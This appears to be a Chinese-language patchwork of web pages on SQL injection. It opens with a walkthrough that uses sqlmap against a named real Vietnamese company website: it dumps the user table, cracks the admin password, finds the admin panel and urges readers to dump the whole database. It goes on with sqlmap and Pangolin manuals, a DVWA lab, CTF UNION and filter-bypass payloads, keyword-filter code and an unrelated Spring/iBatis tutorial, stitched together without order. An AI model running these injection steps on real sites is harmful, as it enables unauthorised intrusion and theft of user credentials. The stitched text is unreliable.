实战:sqlmap注入特殊网址

实战:sqlmap注入特殊网址
实战:sqlmap注入特殊网址

1.目标网站:

http://vietnhatpro.vn/

2.注入点:

这里可以自己找

http://vietnhatpro.vn/index.php/mod,product/task,view/id,20/

可以看到 他的url有点不一样,我们常识把他变成动态的

访问

http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200

发现可以,和上面的地址等效,开始注入

3. 检测注入

sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 –tables

发现可以注入,而且是mysql

但是发现开始接收 information 的那个没用的数据库,太浪费时间所以先关掉

4.列出数据库

sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 –dbs

发现最后一行出现了有用的数据库 vietnhat_db

5. 指定数据库,开始找表

sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 -D vietnhat_db –tables

开始接收表啦,马上就要成功了

Database: vietnhat_db [43 tables]

+-------------------------+

| user |

| admin_menu |

| lang |

| tbl_action |

| tbl_advert |

| tbl_attribute |

| tbl_contact |

| tbl_download |

| tbl_group_attribute |

| tbl_member |

| tbl_module_roll |

| tbl_news |

| tbl_nguoiban |

| tbl_partner |

| tbl_photo |

| tbl_product_attribute |

| tbl_product_attribute2 |

| tbl_productor |

| tbl_project |

| tbl_project_options |

| tbl_roll |

| tbl_service |

| tbl_shopping_cart |

| tbl_slideshow |

| tbl_user_online |

| tbl_usertype_moduleroll |

| tbl_warranty |

| tblabout |

| tblbanner |

| tblcomment |

| tblgroup |

| tblkhachhang |

| tblnguoiban |

| tblpartner |

| tblpoll |

| tblproduct |

| tblsupport |

| tblsystem |

| tblthongtin |

| tblusergroup |

| tblusergroup_moduleroll |

| tblvote |

| user_type |

这个就是数据库里面的表,我找到了user表,感觉里面可能有 管理员

6. 指定表,开始查找列

sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 -D vietnhat_db -T user –columns

这里发现了 id,password, username 之后就没有必要继续下去了,我先关闭

7.开始查找内容

sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 -D vietnhat_db -T user

-C id,username,password --dump

成功找到 admin

开始破解密码

成功找到密码

8. 开始寻找后台

尝试 http://vietnhatpro.vn/admin.php发现失败了尝试 http://vietnhatpro.vn/admin成功找到

登陆之后

发现全都不认识。。。。。。

但是发现最下面有个系统config 可以切换成英语。。。

在这里我就关闭了

9. 开始脱裤

sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 -D vietnhat_db –dump-all

有兴趣的自己去脱裤去吧、

再见

sqlmap使用手册

详解强大的SQL注入工具——SQLMAP Akast [N.S.T] 1. 前言 Windows下的注入工具好的又贵,免费的啊D、明小子等又不好用,我们根本没必要花 时间去找什么破解的havij、pangolin什么的,特别是破解的工具很可能被绑了木马。其实Linux下的注入工具也是非常强大的,不过分的说,可以完全取代Windows下面的所有注入工具。 就如backtrack系统里面就有非常丰富的注入工具,对MSSQL、MYSQL、oracle等各种 数据库的应有尽有了,而且这些工具都是免费的,并且是开放源代码的,我们还可以用来修改为合适自己使用的注入工具。 本文给大家介绍的SqlMap是一个开放源码的渗透测试工具,它可以自动探测和利用SQL 注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多猥琐的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。 2. SQLMAP命令详解 为了方便使用我把sqlmap的选项都翻译出来了,当然可能会存在一些不恰当的地方, 请大家指出,可以给我发邮件:akast@https://www.360docs.net/doc/3517692503.html,。如果我有时间会把这个工具出个中文版。 Options(选项): --version 显示程序的版本号并退出 -h, --help 显示此帮助消息并退出 -v VERBOSE 详细级别:0-6(默认为1) Target(目标): 以下至少需要设置其中一个选项,设置目标URL。 -d DIRECT 直接连接到数据库。 -u URL, --url=URL 目标URL。 -l LIST 从Burp或WebScarab代理的日志中解析目标。 -r REQUESTFILE 从一个文件中载入HTTP请求。 -g GOOGLEDORK 处理Google dork的结果作为目标URL。 -c CONFIGFILE 从INI配置文件中加载选项。 Request(请求):: 这些选项可以用来指定如何连接到目标URL。 --data=DATA 通过POST发送的数据字符串 --cookie=COOKIE HTTP Cookie头 --cookie-urlencode URL 编码生成的cookie注入 --drop-set-cookie 忽略响应的Set - Cookie头信息

网络安全培训方案

培训方案 1、对学生知识的要求 对Windows、Linux及SQL语句有一定的了解即可 2、学生的知识能力提高 本课程重点培训学生的Web渗透测试能力,通过20天的渗透测试培训,学生可具备以下能力 1)、了解 Web服务器的工作过程及原理 2)、了解 HTTP协议 3)、学会渗透测试前踩点技能 4)、学会使用常见的渗透测试工具如burpsuite、SQLmap等等 5)、了解常见的系统攻击过程及手段 6)、学会常见的系统攻击方法 7)、学会 Web服务器的信息获取 8)、学会 IIS、Apache、tomcat、Weblogic等常见中间件的漏洞利用方式及加固方法 9)、深入了解各类SQL注入漏洞的原理、攻击手段及加固措施 10)、掌握上传漏洞、命令执行漏洞、XSS漏洞等常见Web漏洞的利用方式及技巧 11)、掌握各类提权方法 12)、掌握各类第三方插件/程度的漏洞利用方法 3、考试及颁发证书 暂无,可有 4、培训案例分析 安云科技针对学生每年举办两次定期培训,现已经举办了 4次针对学生的培训,同时,受邀给青岛工学院、济南职业技术学院、山东警察学院等学校的老师进行培训

关于提升就业问题:现阶段,国家对信息安全的重视及网络安全行业的火爆,但人才短缺, 安全行业的薪资也普遍高于其它行业,据调查,目前山东省内所有安全公司都面临人员不足的情况 5、培训课程 时间授课内 安排分类容章节实验 Web安全第一节:服务器是如何被入 简介侵的 第二节:如何更好的学习web 安全 1.发起http 请求 第一第一节:http协议解析 2.http 协议详解 3.模拟http 请求 天 4.http 和https 协议区别 Web安全 1.burpsuit 初体验 简介 第二节:截取HTTP请求2.fiddl er介绍 3.winsockexpert 实验 第三节:HTTP应用:黑帽SEO 之搜索引擎劫持 第一节:googlehack 1.搜集子域名 2.搜集web信息第二基础 信息刺 1.安装nmap 天篇第二节:nmap详细讲解 2.探测主机信息探 3.namp脚本引擎 第三节:dirbuster介绍 第四节:指纹识别 1.targe t 2.spide r 第一节:burpsuit 3.scanner 4.Intruder 5.辅助模块 第三漏洞扫 1.wvs向导扫描天描第二节:wvs介绍 2.web扫描服务 3.wvs小工具

Pangolin的使用方法教程

第一章、简介 1.1 Pangolin是什么? Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞,从而达到获取、修改、删除数据,甚至控制数据库服务器、Web服务器的目的的测试方法。Pangolin能够通过一系列非常简单的操作,达到最大化的攻击测试效果。它从检测注入开始到最后控制目标系统都给出了测试步骤。 过去有许多Sql注入工具,不过有些功能不完全,支持的数据库不够多,或者是速度比较慢。但是,在Pangolin发布以后,这些问题都得到了解决。Pangolin也许是目前已有的注入工具中最好的之一。 1.2 使用Pangolin可以用来 如下是一些示例: ?渗透测试人员用于发现目标存在的漏洞并评估漏洞可能产生后果的严重程度?网站管理员可以用于对自己开发的代码进行安全检测从而进行修补 ?安全技术研究人员能够通过Pangolin来更多更深入的理解SQL注入的技术细节 1.3 特色 如下是Pangolin提供的一部分特点: ?全面的数据库支持 ?独创的自动关键字分析能够减少人为操作且更判断结果准确 ?独创的内容大小判断方法能够减少网络数据流量 ?最大话的Union操作能够极大的提高SQL注入操作速度 ?预登陆功能,在需要验证的情况下照样注入 ?代理支持 ?支持HTTPS ?自定义HTTP标题头功能 ?丰富的绕过防火墙过滤功能 ?注入站(点)管理功能 ?数据导出功能

……等其他更多 1.4 它不能做什么 Pangolin只是一个注入验证利用工具,不是一个Web漏洞扫描软件。因此您不能用它来做整网站的扫描。另外,他也不支持注入目录遍历等功能,这些功能您可以借助其他的安全工具进行。 1.5 到哪里获取Pangolin Pangolin的更新速度很快,你可以经常到https://www.360docs.net/doc/3517692503.html,/web/pangolin去下载最新版本。 1.6 运行环境 目前Pangolin只能运行在Windows系统平台,支持32位/64位Windows NT/2000/XP/2003/Vista/2008。 1.7 报告问题和获取帮助 如果您在使用过程中有任何的意见或者建议,您可以到https://www.360docs.net/doc/3517692503.html,网站上进行评论留言,这里会有一群共同兴趣的朋友帮助您。或者您可以直接给我发送邮件:zwell@https://www.360docs.net/doc/3517692503.html,。 第二章、用户界面 下图为主界面图

DVWA中SQL注入实验

实验简介 DVWA (Dam Vulnerable Web Application)DVW A是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。支持很多数据库。所以一个矛一个盾,正好感受一下sql注入。DVW A 的安装就不详细介绍了,需要PHP/apache/mysql sqlmap是开源的,可以在github上找到。 cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数已cookie方式提交了,而一般的注入我们是使用get或者post方式提交,get方式提交就是直接在网址后面加上需要注入的语句,post则是通过表单方式,get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。 实验预备知识 1.web抓包工具的使用; 2.sqlmap的使用 3.了解cookie注入原理 实验操作 一、查找注入点 1.打开Burp Suite,设置浏览器代理上网 图1:Burp Suite设置

图2:浏览器设置 图3:Burp Suite获取web数据包界面。intercept off(关闭)、在点击改建intercept on(开启)

2.将Burp Suite设置成intercept off,登录DVW A,将DVW A安全性设置成low;然后将Burp Suite设置成intercept on,在DVW A的SQL Injection页面上有一个userid输入框,随便输入然后点击submit,在Burp Suite中可以找到GET信息,其中有Request URI和Cookie信息。

spring+springmvc+ibatis整合注解方式实例

1.需求说明 实现用户通过数据库验证登录需求,采用Myeclipse+Tomcat 6.0+Mysql 5.0+JDK 1.6 2.数据库表 开发所用是Mysql数据库,只建立单张用户表T_USER,表结构如下: sql语句如下: CREATE TABLE `t_user` ( `ID` int(11) NOT NULL auto_increment, `USERNAME` varchar(255) default NULL, `PASSWORD` varchar(255) default NULL, PRIMARY KEY (`ID`) ); 3.构建源代码目录

4.用到的jar包(见附件Archive.rar)

5.各项Xml配置文件详解 (1)web.xml文件(Tomcat使用) 服务器根据配置内容初始化spring框架,springmvc框架和log4j日志框架

ISS Spring,SpringMvc,Ibatis webAppRootKey spring_springmvc_ibatis.root log4jConfigLocation /WEB-INF/classes/log4j.properties contextConfigLocation /WEB-INF/classes/applicationContext.xml characterEncodingFilter org.springframework.web.filter.CharacterEncodingFil ter encoding UTF-8 forceEncoding true characterEncodingFilter /*

实战:sqlmap注入特殊网址

1.目标网站: http://vietnhatpro.vn/ 2.注入点: 这里可以自己找 http://vietnhatpro.vn/index.php/mod,product/task,view/id,20/ 可以看到 他的url有点不一样,我们常识把他变成动态的 访问 http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 发现可以,和上面的地址等效,开始注入 3. 检测注入 sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 –tables 发现可以注入,而且是mysql 但是发现开始接收 information 的那个没用的数据库,太浪费时间所以先关掉

4.列出数据库 sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 –dbs 发现最后一行出现了有用的数据库 vietnhat_db 5. 指定数据库,开始找表 sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 -D vietnhat_db –tables

开始接收表啦,马上就要成功了 Database: vietnhat_db [43 tables] +-------------------------+ | user | | admin_menu | | lang | | tbl_action | | tbl_advert | | tbl_attribute | | tbl_contact | | tbl_download | | tbl_group_attribute | | tbl_member | | tbl_module_roll | | tbl_news | | tbl_nguoiban | | tbl_partner | | tbl_photo | | tbl_product_attribute | | tbl_product_attribute2 | | tbl_productor | | tbl_project |

网络安全实验报告_SQL注入攻击

课程名称网络信息安全综合实验实验项目名称SQL注入攻击 一、实验要求 在虚拟机环境查找SQL注入漏洞,通过Metasploit平台的sqlmap攻击实施SQL注入,了解防御措施 二、实验环境 攻击机:BT5r3,IP地址:192.168.200.4 URL:https://www.360docs.net/doc/3517692503.html,/004_zhnews/search/detail.php?id=10832 三、实验步骤 1.打开终端,进入Sqlmap目录:cd /pentest/database/sqlmap 2.通过Sqlmap进行注入攻击。 上图可知:sqlmap探测出URL中的id参数存在着SQL注入点,并包含了基于错误的SQL注入点以及UNION查询注入点。 由上图可知后台数据库的版本是MySQL 5.0,Web应用平台为PHP 4.4.9/Apache 1.3.28。 3.通过Sqlmap获取数据库名。

4.通过Sqlmap获取表名。本实验以efair数据库为例:

5.通过Sqlmap获取列名。以efair数据库里的auth_user为例:课看到有password一列: 6.通过Sqlmap导出password列的内容。

由图可知,获取这个web应用后台数据库的所有作者用户账户和口令哈希,并保存为一个本地的txt文件。该文件如下图:

7.查看Sqlmap支持的Shell。 四、实验小结 本次实验过程中,在寻找可进行注入的URL过程中,尝试着对多个URL进行SQL注入,使用“and 1=1”及“and 1=2”确认网站是否有SQL注入漏洞,试验过程中大部分网站都禁止非法语句,最终实验使用URL为乌云网上提供的一个可进行SQL注入的网站。通过本次

POST GET与COOKIE注入原理

POST GET与COOKIE注入原理 一般的http请求不外乎get 和post两种,如果过滤掉所有post或者get请求中的参数信息中的非法字符,那么也就实现了防SQL注入。 首先定义请求中不能包含如下字符: '|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare 各个字符用"|"隔开,然后再判断Request.QueryString,具体代码如下: get请求的非法字符过滤: dim sql_injdata SQL_injdata = "'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare" SQL_inj = split(SQL_Injdata,"|") If Request.QueryString<>"" Then For Each SQL_Get In Request.QueryString For SQL_Data=0 To Ubound(SQL_inj) if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then Response.Write "" Response.end end if next Next End If post请求的非法字符过滤: If Request.Form<>"" Then For Each Sql_Post In Request.Form For SQL_Data=0 To Ubound(SQL_inj) if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then Response.Write "" Response.end end if next next end if 然后在使用的时候将这两段代码放在数据库连接的文件里一起Include进来即可。

sqlmap使用手记

测试许多款sql注入工具最终还是发现sqlmap最为强悍谁用谁知道! 赶紧抛弃掉手上一大堆sql注入工具吧:) 测试环境:ubuntu10.10&windows7(x64)sqlmap/1.0-dev(r4405)Python2.7.2 *高版本python可能导致sqlmap报错! *如使用过程中出错请使用下面最近更新的稳定版本: https://www.360docs.net/doc/3517692503.html,/c0adthmqf1 更新升级: sqlmap-update svn checkout https://https://www.360docs.net/doc/3517692503.html,/sqlmap/trunk/sqlmap sqlmap-dev 帮助: sqlmap-h 官方最新文档:https://www.360docs.net/doc/3517692503.html,/doc/README.html ******************基本步骤*************** sqlmap-u"http://url/news?id=1"--current-user#获取当前用户名称 sqlmap-u"https://www.360docs.net/doc/3517692503.html,/news?id=1"--current-db#获取当前数据库名称 sqlmap-u"https://www.360docs.net/doc/3517692503.html,/news?id=1"--tables-D"db_name"#列表名 sqlmap-u"http://url/news?id=1"--columns-T"tablename"users-D"db_name"-v0#列字段sqlmap-u"http://url/news?id=1"--dump-C"column_name"-T"table_name"-D "db_name"-v0#获取字段内容 ******************信息获取****************** sqlmap-u"http://url/news?id=1"--smart--level3--users#smart智能level执行测试等级

Web漏洞实战官方题解

这个题目是Union型sql注入,没有进行任何过滤,可以通过sqlmap或者手注。 通过单引号截断sql查询语句: 可以利用and 1=2进行union注入,获取注入结果回显: 2的位置可以回显,接下来猜测表名,当from flag的时候可以正常回显: 表名错误的话则查询不到数据: 列名类似,最终的POC: http://10.3.242.167/hackit/question/sqli1/index.php?id=1' and 1=2 union select 1,flag from flag %23

得到: 如果使用sqlmap的话: 首先使用-u判断是否存在注入: 发现可以Union、布尔型、基于时间……于是,分别使用—dbs –tables –columns可以得到数据库名、表名、列名,最后用: sqlmap.py -u "http://10.3.242.167/hackit/question/sqli1/index.php?id=1" -D one -T flag –dump 这个题目过滤了一些关键字,但是可以利用大小写混写进行绕过:

将and关键字用&&代替,注意要进行url编码,最后的payload如下: http://10.3.242.167/hackit/question/sqli2/index.php?id=1' %26%26 1=2 UNion sElect 1,flag fRom flag %23 这个看泽哥注入的时候,发现可以利用—tamper=randomcase,使用sqlmap的随机大小写关键字脚本,直接也可以得到结果: sqlmap.py -u "http://10.3.242.167/hackit/question/sqli2/index.php?id=1" --tamper=randomcase 后面的同第一个: 这个题目看源码可以发现把union整个给过滤了,所以只能通过Bool型盲注了:

Web攻防系列教程之Cookie注入攻防实战

Web攻防系列教程之Cookie注入攻防实战 摘要 随着网络安全技术的发展,SQL注入作为一种很流行的攻击方式被越来越多的人所知晓。很多网站也都对SQL注入做了防护,许多网站管理员的做法就是添加一个防注入程序。这时我们用常规的手段去探测网站的SQL注入漏洞时会被防注入程序阻挡。遇到这种情况我们该怎么办?难道就没有办法了吗?答案是否定的。我们知道,一般的防注入程序都是基于“黑名单”的,根据特征字符串去过滤掉一些危险的字符。一般情况下我们认为黑名单是不安全的,它存在被绕过的风险。比如有的防注入程序只过滤了通过GET、POST方式提交的数据,对通过Cookie方式提交的数据却并没有过滤,这时我们该怎么办?在本文你将会找到答案。 Cookie背景介绍 Cookie最先是由Netscape(网景)公司提出的,Netscape官方文档中对Cookie的定义是这样的:Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。 Cookie的用途 Cookie的用途非常广泛,在网络中经常可以见到Cookie的身影。它通常被用来辨别用户身份、进行session跟踪,最典型的应用就是保存用户的帐号和密码用来自动登录网站和电子商务网站中的“购物车”。 Cookie注入原理 Cookie注入简单来说就是利用Cookie而发起的注入攻击。从本质上来讲,Cookie注入与传统的SQL注入并无不同,两者都是针对数据库的注入。只是表现形式上略有不同罢了。 要想深入了解Cookie注入的成因,必须要了解ASP脚本中的request对象。它被用来获取客户端提交的数据。先来看下ASP开发文档中对request对象的描述: 图一 Request对象的使用方法一般是这样:request.[集合名称](参数名称),比如获取从表单中提

SQLMAP使用手册

sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 sqlmap简介 sqlmap支持五种不同的注入模式: ?1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 ?2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 ?3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 ?4、联合查询注入,可以使用union的情况下的注入。 ?5、堆查询注入,可以同时执行多条语句的执行时的注入。 sqlmap支持的数据库有 MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB 检测注入 基本格式 sqlmap -u “https://www.360docs.net/doc/3517692503.html,/post.php?id=1″ 默认使用level1检测全部数据库类型 sqlmap -u “https://www.360docs.net/doc/3517692503.html,/post.php?id=1″ –dbms mysql –level 3 指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面) 跟随302跳转 当注入页面错误的时候,自动跳转到另一个页面的时候需要跟随302, 当注入错误的时候,先报错再跳转的时候,不需要跟随302。 目的就是:要追踪到错误信息。 cookie注入 当程序有防get注入的时候,可以使用cookie注入 sqlmap -u “https://www.360docs.net/doc/3517692503.html,/shownews.asp” –cookie “id=11″ –level 2(只有level达到2才会检测cookie) 从post数据包中注入 可以使用burpsuite或者temperdata等工具来抓取post包 sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql 指定username参数 注入成功后 获取数据库基本信息 sqlmap -u “https://www.360docs.net/doc/3517692503.html,/post.php?id=1″ –dbms mysql –level 3 –dbs 查询有哪些数据库 sqlmap -u “https://www.360docs.net/doc/3517692503.html,/post.php?id=1″ –dbms mysql –level 3 -D test –tables 查询test数据库中有哪些表 sqlmap -u “https://www.360docs.net/doc/3517692503.html,/post.php?id=1″ –dbms mysql –level 3 -D test -T admin –columns 查询test数据库中admin表有哪些字段

sqlmap使用笔记[中文]

Sqlmap 最新测试文档 Email:linuxseclab@https://www.360docs.net/doc/3517692503.html, 测试许多款sql注入工具 最终还是发现sqlmap 最为强悍 谁用谁知道! 赶紧抛弃掉手上一大堆sql注入工具吧 : ) 测试环境:ubuntu 10.10 & windows 7(x64) sqlmap/1.0-dev (r4405) 如使用过程中出错 请使用下面最近更新的稳定版本: https://www.360docs.net/doc/3517692503.html,/c0adthmqf1 更新升级 : sqlmap -update svn checkout https://https://www.360docs.net/doc/3517692503.html,/sqlmap/trunk/sqlmap sqlmap-dev 帮助: sqlmap -h 官方最新文档:https://www.360docs.net/doc/3517692503.html,/doc/README.html ******************基本步骤*************** sqlmap -u "http://url/news?id=1" --current-user #获取当前用户名称 sqlmap -u "https://www.360docs.net/doc/3517692503.html,/news?id=1" --current-db #获取当前数据库名称 sqlmap -u "https://www.360docs.net/doc/3517692503.html,/news?id=1" --tables -D "db_name" #列表名 sqlmap -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 #列字段sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0 #获取字段内容 ******************信息获取****************** sqlmap -u "http://url/news?id=1" --smart --level 3 --users # smart智能 level 执行测试等级

sqlmap中tamper的套用编写

SQLmap中tamper的套用与编写 导语:tamper脚本不全,没有想要的功能,那就套用别人的思路改一个吧,不行,那就自己编一个……… 为了说明tamper的结构,让我们从一个最简单的例子开始 为了说明tamper的结构,让我们从一个最简单的例子开始 # sqlmap/tamper/escapequotes.py fromlib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST def dependencies(): pass def tamper(payload, **kwargs): returnpayload.replace("'", "\\'").replace('"', '\\"') 不难看出,一个最小的tamper脚本结构为priority变量定义和dependencies、tamper函数定义。 priority定义脚本的优先级,用于有多个tamper脚本的情况。dependencies函数声明该脚本适用/不适用的范围,可以为空。 tamper是主要的函数,接受的参数为payload和**kwargs 返回值为替换后的payload。比如这个例子中就把引号替换为了\\'。 我们在选一个脚本,该脚本为base64encode.py,查看脚本中的tamper内容:

可以看到内容非常简单,将payload的内容内容做了base64编码然后直接返回。Tamper 有两个参数第一个参数payload即为传入的实际要操作的payload,第二个参数**kwargs 为相关httpheader。譬如你想插入或则修改header的时候可以用到。 逻辑流程弄清楚之后,很容易编写自己的tamper脚本了。 以使用%a0替换空格的脚本为例,在tamper目录下创建space2ao.py脚本,稍微修改下脚本:

sqlmap常用命令

sqlmap简介 sqlmap支持五种不同的注入模式: ?1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 ?2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 ?3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 ?4、联合查询注入,可以使用union的情况下的注入。 ?5、堆查询注入,可以同时执行多条语句的执行时的注入。 sqlmap支持的数据库有 MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB 检测注入 基本格式 sqlmap -u ―https://www.360docs.net/doc/3517692503.html,/post.php?id=1″ 默认使用level1检测全部数据库类型 sqlmap -u ―https://www.360docs.net/doc/3517692503.html,/post.php?id=1″ –dbms mysql –level 3 指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面) 跟随302跳转 当注入页面错误的时候,自动跳转到另一个页面的时候需要跟随302, 当注入错误的时候,先报错再跳转的时候,不需要跟随302。 目的就是:要追踪到错误信息。 cookie注入 当程序有防get注入的时候,可以使用cookie注入 sqlmap -u ―https://www.360docs.net/doc/3517692503.html,/shownews.asp‖ –cookie ―id=11″ –level 2(只有level达到2才会检测cookie) 从post数据包中注入 可以使用burpsuite或者temperdata等工具来抓取post包 sqlmap -r ―c:\tools\request.txt‖ -p ―username‖ –dbms mysql 指定username参数 注入成功后 获取数据库基本信息 sqlmap -u ―https://www.360docs.net/doc/3517692503.html,/post.php?id=1″ –dbms mysql –level 3 –dbs

Pangolin的使用方法教程

第一章、简介 由zwell 于周四, 05/15/2008 - 13:34 提交。 1.1 Pangolin是什么? Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞,从而达到获取、修改、删除数据,甚至控制数据库服务器、Web服务器的目的的测试方法。Pangolin能够通过一系列非常简单的操作,达到最大化的攻击测试效果。它从检测注入开始到最后控制目标系统都给出了测试步骤。 过去有许多Sql注入工具,不过有些功能不完全,支持的数据库不够多,或者是速度比较慢。但是,在Pangolin发布以后,这些问题都得到了解决。Pangolin也许是目前已有的注入工具中最好的之一。 1.2 使用Pangolin可以用来 如下是一些示例: ?渗透测试人员用于发现目标存在的漏洞并评估漏洞可能产生后果的严重程度?网站管理员可以用于对自己开发的代码进行安全检测从而进行修补 ?安全技术研究人员能够通过Pangolin来更多更深入的理解SQL注入的技术细节 1.3 特色 如下是Pangolin提供的一部分特点: ?全面的数据库支持 ?独创的自动关键字分析能够减少人为操作且更判断结果准确 ?独创的内容大小判断方法能够减少网络数据流量 ?最大话的Union操作能够极大的提高SQL注入操作速度 ?预登陆功能,在需要验证的情况下照样注入 ?代理支持 ?支持HTTPS ?自定义HTTP标题头功能 ?丰富的绕过防火墙过滤功能 ?注入站(点)管理功能 ?数据导出功能

……等其他更多 1.4 它不能做什么 Pangolin只是一个注入验证利用工具,不是一个Web漏洞扫描软件。因此您不能用它来做整网站的扫描。另外,他也不支持注入目录遍历等功能,这些功能您可以借助其他的安全工具进行。 1.5 到哪里获取Pangolin Pangolin的更新速度很快,你可以经常到https://www.360docs.net/doc/3517692503.html,/web/pangolin去下载最新版本。 1.6 运行环境 目前Pangolin只能运行在Windows系统平台,支持32位/64位Windows NT/2000/XP/2003/Vista/2008。 1.7 报告问题和获取帮助 如果您在使用过程中有任何的意见或者建议,您可以到https://www.360docs.net/doc/3517692503.html,网站上进行评论留言,这里会有一群共同兴趣的朋友帮助您。或者您可以直接给我发送邮件:zwell@https://www.360docs.net/doc/3517692503.html,。 第二章、用户界面 下图为主界面图

实验三-渗透攻击工具 SQLMap

实验三渗透攻击工具测试(SQLMap) 一、注入简介 SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以市面的防火墙都不会对SQL注入发出警报,如果管理员没查看ⅡS日志的习惯,可能被入侵很长时间都不会发觉。但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况,需要构造巧妙的SQL语句,从而成功获取想要的数据。 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,日前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。sqlmap的功能强大到让你惊叹,常规注入工具不能绕过的话,终极使用sqlmap会有意想不到的效果。 二、实验简介 总体思路: ·发现SQL注入位置;

·判断后台数据库类型; ·确定XP_CMDSHELL可执行情况 ·发现WEB虚拟目录 ·上传ASP木马; ·得到管理员权限; 三、测试 (一)检测注入点是否可用 1.C:\Python27\sqlmap>python sqlmap.py -u "http://19 2.168.1.150 /products.asp?id=134" 参数:-u:指定注入点url 结果:

渗透测试工具sqlmap基础教程

渗透测试工具sqlmap基础教程 转载地址:https://www.360docs.net/doc/3517692503.html,/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由Python语言开发而成,因此运行需要安装python环境。 既然本文是基础教程,以下只写工具的基本使用方法。 本教程为sqlmap具体应用案例,如需了解更多sqlmap资料可以访问官方 https://www.360docs.net/doc/3517692503.html,,或者乌云知识库 https://www.360docs.net/doc/3517692503.html,/tips/401和https://www.360docs.net/doc/3517692503.html,/tips/143。

测试环境:本地搭建的具有sql注入点的网站 http://192.168.1.150 注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。 教程开始: 一、检测注入点是否可用 [plain]view plain copy 1.C:\Python27\sqlmap>python sqlmap.py -u "http://19 2.168.1.150/products.asp?id =134" 参数: -u:指定注入点url 结果:

注入结果展示: (1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。

相关文档
最新文档